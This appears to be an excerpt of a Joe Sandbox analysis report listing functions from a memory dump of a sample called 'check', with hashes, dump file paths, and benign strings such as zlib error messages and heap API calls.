Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: 318da75e88e9541bd9e64392806fd677589fa8fdf52f93c5373d7c7e5dbcacdc
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: 7DE1B432A6865A81FB689F25C75013D33A0FF69B48F144137DA4E87794DF2AEA61CB40

Function 00007FF6D923A2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF6D923A442
incorrect header check, xrefs: 00007FF6D923A45B

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction ID: c18da669ce3b52a4d86adbdf610f2bfee49d788178bfcc62f84418c7ecadb877
Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction Fuzzy Hash: 10918472A282C687F7A49F25D548B3E3AADFF45354F11423EDA4A86780DF38E950CB40

Function 00007FF6D924DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF6D924E07A
e+000, xrefs: 00007FF6D924DFFD

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: 33632db17c7c79646697de44ca44fa424af3eaa65f10dcb30f3657f604dc60bd
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: 14515962B282C146F7258E359A0176D6B91F768BA4F48D233CBAC87AC5CF3DE455CB01

Function 00007FF6D924DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6D924DD9E

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 5c5659fd9b4d0d7490cfbaa0ccbd3f54fc65f21868e5b75c709986308c5230f4
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 89A14763A187C986FB21CF25E5007AD7B91EB69B84F048232DE4D87B85DE3DE511CB01

Function 00007FF6D9248794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6D92487B3

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: 14a31b9a7b73ea59a4cd8601284bdfb253dac575f193736bbf2f33c106050206
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: 6C51CF21F3864641FE68AF265B0117E5290AF68BD8F484437DE0EC77D6EE3CE4628A41

Function 00007FF6D9253480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6D9253484

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: 77429fa4598fd914d2c5a56895cff8f44fc31aae45d1b51a027966f274b0f77b
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: FEB09220E27A06C2FA482F217D8223C22A47F48700FA8013AC10CD0334DE2C25F59710

Function 00007FF6D92435A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: 807471a22f7027b409a56a32800891ea55501c784327a5d90c42b5d5e2fe28ba
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 74D1B672A2864A85FB6C8E25874027D27A0EF29B48F144236CE4D877D5DF39DA65CF40

Function 00007FF6D9239800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: e14baacc7696a5f5fb3e4eee4235f101a2be3b0109b517d1bf17fd8f59aaaaef
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: 69C19F762281E08BE289EB29E47947A73E1F78930DB95406BEF87477C5CB3CA414DB10

Function 00007FF6D9242C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: 8166ddfd75db1ff1d232293d6a0aab93535930f2efe1c5d474705dd239c20bfd
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: 5FB19C72A28B8585F7658F6AD55023C3BB0EB6DF48F250136CA4E87395CF39E461CB44

Function 00007FF6D924E570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: 7b410d8d531a97ca0631d44b3aa4aab79348023d0ffb107957c6370b53b496cc
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 2481E772A2878146FB74CF19A64437D7691FB597A4F104236DA9D87B95DF3CE4208F00

Function 00007FF6D9256418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
Instruction ID: 8dbfa528b3be292b96c54a8c47d106f97f9456e4fe40f0ad66434e1408d9ac6e
Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
Instruction Fuzzy Hash: 8561D362E3C29246FBF48E68965467F6680AF50770F54423BE61DC3ACDDE7DE8248B00

Function 00007FF6D9242164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 6d2db7f80ed242bc3345f1773e144fcf0003c328f6ce847d88fbde531c036e8a
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: C5516436A2865185FB248F6AC54423C37B1EB6CB68F245132CE4D87795CF7AE863CB40

Function 00007FF6D9241944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 14038e7279ebb50b63016a322118df7a5f01178649fc71d3dc102a4139f30445
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: A5516576A2865185FB248F29C14523C37A0EB7DB58F244132CE8D97796DF3AE863CB40

Function 00007FF6D9241D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 6727e1cac36e452e8cf28f456f0c7a063d3603cf2adcdb3acb8e142dbda6ea42
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: B2517176A2865182F7248F29D54123C37A0EB7DB68F244132CE4D97796CF3AE863CB40

Function 00007FF6D9241B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: f3955bb11b1dce3a489f02d19a0407a32fa4cb6fcf3ca41d2374a34fec27ec69
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 0351A076A2865186F7248F29C64122C37A0EB78B58F244132CA4C97796DF3AE863CB40

Function 00007FF6D9241F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: fed31197a93f0081bfb1d0a95e56291b0d7018d1a4932bb408e2cbf144c66cb6
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: EC517F36B2965185F7248F2AC14027C37B1EB6CB58F255132CA4D977A6CF3AE863CB40

Function 00007FF6D9241740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: f504cac59fa50263290c430b108d21816296a29debcec37487e03198c0f36bd3
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 81514176B2865586F7248F29C14523C37A1EB79B58F244132CE4D97796CF3AE863CB80

Function 00007FF6D9245D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 67c5d0359fb777f582a7f50ceeaefa25a963ed2cdd5bbd4cd39a9fadb593d46a
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: E241D662D3D74A85F9AA8D9C0B08EBC27C09F3A7A0D5812B6DDED973C3CD1D65A6C500

Function 00007FF6D9249EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 55393480caabbef314b467784a730f0826c31d73a2e8ac0b9b4ffe13c675b833
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 2141E322729A5582FF04CF2ADA1416D63A1BB58FD0B09A433EE0DD7B58DE3CC0628740

Function 00007FF6D92480E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: c6128825055a833d5b59d0204f8048075bca0d1fe18e6fc11c18d20c30f10ce6
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: A031D532B29B4241F7649F256A4013E6AD5AF99BD0F14423AEA8DD7BD9DF3CD0218B04

Function 00007FF6D9259570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: 8ed4314524cd99b782faeecef30a6473f8ac269731c40315d3991bf79986745b
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: DAF04471B292968AEBA88F69B50262977D0F708380F90903AE58DC3A44DE3C91618F54

Function 00007FF6D923D30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: 2e1c1c400dcb663e897b404d9b9dd24dc58dcbeab388740d6d4e6cb7c2b8d7d1
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: 5DA0012192C84AD0F6848F20EA901792220BB54300B800136E00DD14A4DE2DA824D711

Function 00007FF6D9235830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

